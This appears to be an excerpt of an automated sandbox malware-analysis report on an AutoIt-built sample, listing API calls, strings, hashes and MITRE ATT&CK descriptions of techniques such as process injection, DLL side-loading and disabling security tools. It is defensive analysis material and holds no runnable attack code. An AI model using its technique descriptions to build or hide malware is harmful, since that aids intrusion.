APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A06761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A0676C

Strings

Combobox, xrefs: 00A0672E

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 3f8e3de09419f68bf6f6e91d9f2fe9fa2269eac39c66d2c3c95c4c938f4fdee4
Instruction ID: b66b3037001e70e0321c66483c45ec62396b39c6645d529ba4e79f72bc62c32a
Opcode Fuzzy Hash: 3f8e3de09419f68bf6f6e91d9f2fe9fa2269eac39c66d2c3c95c4c938f4fdee4
Instruction Fuzzy Hash: C811B67560020DAFEF11DF54DC80EAB376AEB8436CF100129F914972D0D671DC6187A0

Function 00A06C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00981D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00981D73
Part of subcall function 00981D35: GetStockObject.GDI32(00000011), ref: 00981D87
Part of subcall function 00981D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00981D91

GetWindowRect.USER32(00000000,?), ref: 00A06C71
GetSysColor.USER32(00000012), ref: 00A06C8B

Strings

static, xrefs: 00A06C4E

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 76d9e7d72afb15b1cdb9ddcca8a3e24c30563085e2ad2e410f75c28b7b323a11
Instruction ID: a9d8f497e70c836b9cc2108e7edbbac7f4891a0b76ffeeb9a6517c9bb7e96197
Opcode Fuzzy Hash: 76d9e7d72afb15b1cdb9ddcca8a3e24c30563085e2ad2e410f75c28b7b323a11
Instruction Fuzzy Hash: 8421297651020DAFDF14DFB8DC45AFA7BB8FB08318F004629F995E2290D635E861DB60

Function 00A06920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00A069A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00A069B1

Strings

edit, xrefs: 00A06986

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: dc0262968da26381e6a5563f08e3758fb3d8010d11a91e578d816b8650721aad
Instruction ID: 20e49841a03bae350b656820f2961ad37e8ec9cdcefefc4364f27a33847092a2
Opcode Fuzzy Hash: dc0262968da26381e6a5563f08e3758fb3d8010d11a91e578d816b8650721aad
Instruction Fuzzy Hash: 8E116D7150020CAFEB108F64AC44AEB3669EB053B8F504724F9A5A75E0C771DC619760

Function 009E29AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009E2A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 009E2A41

Strings

0, xrefs: 009E2A18

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: bc5b6e434d2a002c58ce3d3f18b8b6693348d4ec04910237b61dc38287479ef3
Instruction ID: 0b5bae218dae25375ef4b959d1aeb6693725c43605bf245df2084757851a1dd6
Opcode Fuzzy Hash: bc5b6e434d2a002c58ce3d3f18b8b6693348d4ec04910237b61dc38287479ef3
Instruction Fuzzy Hash: 4311E236D01294EBCB32DBA9DC44BAA73BDAB86304F144031E855E72D1D770ED0AC791

Function 009F21D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 009F222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 009F2255

Strings

<local>, xrefs: 009F221D

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 7c9447c21ac02f2660a5b7eeb64007e6744b6eecb2504990f3fd2cc9c40e1e8c
Instruction ID: c56e100808e5511209ecddedb86302e982d284fedb3a5a9473b8315b433492ef
Opcode Fuzzy Hash: 7c9447c21ac02f2660a5b7eeb64007e6744b6eecb2504990f3fd2cc9c40e1e8c
Instruction Fuzzy Hash: CD11E070641229BAEB298F518C95FFBFBACFF06751F10862AFA2456040D2706881D7F1

Function 009D8E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22

Part of subcall function 009DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 009DAABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 009D8E73

Strings

ListBox, xrefs: 009D8E3D
ComboBox, xrefs: 009D8E12

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: f97751de70a10aba16a55c5a13fb50ba6309e57dd4a90c6369a654ef5d37861b
Instruction ID: 162e8cd625ea402f3ed16ee2809cf9ffb4af688bf8ce71ebd909241b696ce821
Opcode Fuzzy Hash: f97751de70a10aba16a55c5a13fb50ba6309e57dd4a90c6369a654ef5d37861b
Instruction Fuzzy Hash: 4C01F5B1641218ABCF14FBE0CC419FE7369AF81320B504A1AF821573D2DE319809C760

Function 009E8D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 009E8DAC
__fread_nolock.LIBCMT ref: 009E8DC1

Strings

EA06, xrefs: 009E8DF3

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 76e7788564049a4dd8b2a22dccad2364604024e01218b19c3e276399c3f7a4e8
Instruction ID: 993d912281950b144420530071e60415ddaa10719fce6aeb575dd6802512c3d3
Opcode Fuzzy Hash: 76e7788564049a4dd8b2a22dccad2364604024e01218b19c3e276399c3f7a4e8
Instruction Fuzzy Hash: 2E01F971D042587EDB18CAA8CC16FEE7BFCDB11301F00459AF556D21C1E879A60487A0

Function 009D8CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22

Part of subcall function 009DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 009DAABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 009D8D6B

Strings

ListBox, xrefs: 009D8D35
ComboBox, xrefs: 009D8D0A

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 962df3eec8dafdb184d43a23b6f0a9a06c6209513b8d3d575b30a464b20de979
Instruction ID: 9ef452ea82a23f0770818d561d85f753842504261850f32fb8cf0337b0f698be
Opcode Fuzzy Hash: 962df3eec8dafdb184d43a23b6f0a9a06c6209513b8d3d575b30a464b20de979
Instruction Fuzzy Hash: 3601DFB5A81108BBCF24EBE0C952BFF73A99F55340F60441AB802633E2DE259E08D371

Function 009D8D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22

Part of subcall function 009DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 009DAABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 009D8DEE

Strings

ListBox, xrefs: 009D8DBA
ComboBox, xrefs: 009D8D8F

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 9a093d8f8493bb20895b24fb78961fa382cadaacfa183eb8b00aea64d50cf021
Instruction ID: 726c42289c5f45f94ca6a4cde38ba74c3af42b42afd54775d4590306bee9d45c
Opcode Fuzzy Hash: 9a093d8f8493bb20895b24fb78961fa382cadaacfa183eb8b00aea64d50cf021
Instruction Fuzzy Hash: 3301A2B1A81109BBDF21FAE4C942BFF77AD9F11300F518516B805A33D2DE259E19D271

Function 009E4F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 009E4F46
_wcscmp.LIBCMT ref: 009E4F58

Strings

#32770, xrefs: 009E4F52

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: c9e3069a04e9f03bda8809d64417583147f083e1a1126d120b05f5d81c93c902
Instruction ID: 786c3c20067b8b518241557f7ec9c595db90a54e147bf68f942338088c0a80fb
Opcode Fuzzy Hash: c9e3069a04e9f03bda8809d64417583147f083e1a1126d120b05f5d81c93c902
Instruction Fuzzy Hash: 18E0D13690432C2BD720DB999C45FA7F7ACEB86B71F000057FD04D7051D5609B4687D1

Function 009BB2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 009BB314: _memset.LIBCMT ref: 009BB321

Part of subcall function 009A0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,009BB2F0,?,?,?,0098100A), ref: 009A0945

IsDebuggerPresent.KERNEL32(?,?,?,0098100A), ref: 009BB2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0098100A), ref: 009BB303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 009BB2FE

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: dd452b19dee53cdfcc87eca2987aee77e3592f85bffc3b891036c228be995b01
Instruction ID: ca6df35b513dd218c0c460895dcbbd6a600127684c0ee59d10b5862d6ed4ca17
Opcode Fuzzy Hash: dd452b19dee53cdfcc87eca2987aee77e3592f85bffc3b891036c228be995b01
Instruction Fuzzy Hash: 23E06D742007108FD770DF68E5043867AE8AF84724F018A3DE456C7681E7F5E405CBA1

Function 009D7C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 009D7C82

Part of subcall function 009A3358: _doexit.LIBCMT ref: 009A3362

Strings

AutoIt, xrefs: 009D7C76
Error allocating memory., xrefs: 009D7C7B

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: ed7ae5ba72eefbf3e6d5ce2cdf7211d6f485c3d7f27520d7e46335f026ac266d
Instruction ID: 794091b901e1c015abd2c71f083288cbce94fd75e28959609b3183af82b79ad9
Opcode Fuzzy Hash: ed7ae5ba72eefbf3e6d5ce2cdf7211d6f485c3d7f27520d7e46335f026ac266d
Instruction Fuzzy Hash: DBD05B323C83583BD62532F56C07FCA754C4F46B52F144816FB08696D34DD245D152E5

Function 009C1935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 009C1775

Part of subcall function 009FBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,009C195E,?), ref: 009FBFFE
Part of subcall function 009FBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 009FC010

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 009C196D

Strings

WIN_XPe, xrefs: 009C1788

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: 576a7303e32f608f6dddc2b82ad13d51d05812532e59ee5e98d6c8f6fc376a4b
Instruction ID: 8ed217c7c54946723647be0215dd202859fe7d1c70cfdc376e5e1e336e2ae071
Opcode Fuzzy Hash: 576a7303e32f608f6dddc2b82ad13d51d05812532e59ee5e98d6c8f6fc376a4b
Instruction Fuzzy Hash: FAF0A57080410DDFDB26DBA1C994BECBAF8AB49301F540499E102B6191D7754E86DF66

Function 00A05998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A059AE
PostMessageW.USER32(00000000), ref: 00A059B5

Part of subcall function 009E5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009E52BC

Strings

Shell_TrayWnd, xrefs: 00A059A7

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 315310e532ef519e9888c80dcc199f525b38a50ed5bbd305569c4464ce3ca452
Instruction ID: 30941cbed10a4a420abc6525a0c72ac6e9e5e95d9284f5ffd52402d73ef33fb4
Opcode Fuzzy Hash: 315310e532ef519e9888c80dcc199f525b38a50ed5bbd305569c4464ce3ca452
Instruction Fuzzy Hash: 8DD0C9317843557BE678ABB09C0BF966615BB44B51F010825B356AA5D4C9E4A802C654

Function 00A05964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A0596E
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00A05981

Part of subcall function 009E5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009E52BC

Strings

Shell_TrayWnd, xrefs: 00A05967

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 966ae2bdfdfd85ddcf8fdb27d4bce2f4c059d928f89d5bcf4e5131369fe26c7f
Instruction ID: 372bfc3cafae136b6c92b2c4e21baad3812129d30edcdc0f148415b69970281b
Opcode Fuzzy Hash: 966ae2bdfdfd85ddcf8fdb27d4bce2f4c059d928f89d5bcf4e5131369fe26c7f
Instruction Fuzzy Hash: 67D0C931784355BBE678ABB09C1BF966A15BB40B51F010825B35AAA5D4C9E4A802C654

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
